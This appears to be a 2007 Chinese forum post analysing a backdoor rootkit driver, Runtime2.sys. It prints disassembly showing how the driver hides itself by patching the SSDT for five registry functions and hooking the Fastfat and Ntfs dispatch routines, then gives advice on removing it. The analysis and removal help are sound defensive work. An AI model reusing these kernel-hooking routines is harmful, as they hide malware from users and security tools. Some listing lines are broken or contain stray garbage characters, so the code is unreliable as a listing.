修改系统服务分发表原生api函数地址拦截与注册表相关的五条系统服务,挂钩fastfat.sys/ntfs.sys从个而使无法找到病毒
sub_1286E proc near
var_4= dword ptr -4
mov edi, edi
push ebp
mov ebp, esp
push ecx
cli
mov eax, cr0
mov [ebp+var_4], eax
and eax, 0FFFEFFFFh
mov cr0, eax
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwOpenKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_12192
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwEnumerateKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_1224A
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwEnumerateValueKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_12412
mov ecx, ds:KeServiceDescriptorTable
mov ecx, [ecx]
mov eax, ds:ZwSetValueKey
mov eax, [eax+1]
mov dword ptr [ecx+eax*4], offset loc_125DA
mov ecx, ds:KeServiceDescriptorTable
mov eax, ds:ZwDeleteValueKey
mov eax, [eax+1]
mov ecx, [ecx]
mov dword ptr [ecx+eax*4], offset loc_12730
mov eax, [ebp+var_4]
mov cr0, eax
sti
leave
retn
sub_11CB8 proc near
DestinationString= UNICODE_STRING ptr -8
arg_0= dword ptr 8
mov edi, edi
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
mov eax, esi
xor ebx, ebx
sub eax, ebx
push edi
jz short loc_11CD7
dec eax
jnz short loc_11CE6
offset s_FilesystemFas ; "\\FileSystem\\Fastfat"
jmp short loc_11CDC
??觲L /
loc_11CD7: ; "\\FileSystem\\Ntfs"
push offset s_FilesystemNtf
loc_11CDC:
lea eax, [ebp+DestinationString]
push eax ; DestinationString
call ds:RtlInitUnicodeString
loc_11CE6:
mov eax, ds:IoDriverObjectType
mov edi, esi
shl edi, 2
lea esi, dword_12E44[edi]
push esi
push ebx
push ebx
mov [esi], ebx
push dword ptr [eax]
lea eax, [ebp+DestinationString]
push ebx
push ebx
push 40h
push eax
call ds:ObReferenceObjectByName
cmp eax, ebx
jl short loc_11D4F
cli
mov eax, cr0
mov [ebp+arg_0], eax
and eax, 0FFFEFFFFh
mov cr0, eax
mov ecx, [esi]
mov eax, offset loc_11A06
add ecx, 38h
xchg eax, [ecx]
mov ecx, [esi]
mov dword_12E1C[edi], eax
mov eax, offset word_11AF2
add ecx, 68h
xchg eax, [ecx]
mov dword_12E30[edi], eax
mov eax, [ebp+arg_0]
mov cr0, eax
sti
xor eax, eax
loc_11D4F:
pop edi
pop esi
pop ebx
leave
retn 4
sub_11CB8 endp
连驱动都没有放出来就被微点拦截了,苦命的娃
Rootkit解除方法,直供解除该病毒Rootkit右键选择修复函数入口地址,不要用全部修复,否则在安装主防类型杀软的情况下会造成系统崩溃
把函数地址在Runtime2.sys全部修复,该后门Rootkit就解决了,其他就没有什么技术含量了
[ 本帖最后由 人浪流涯天 于 2007-10-4 18:19 编辑 ] |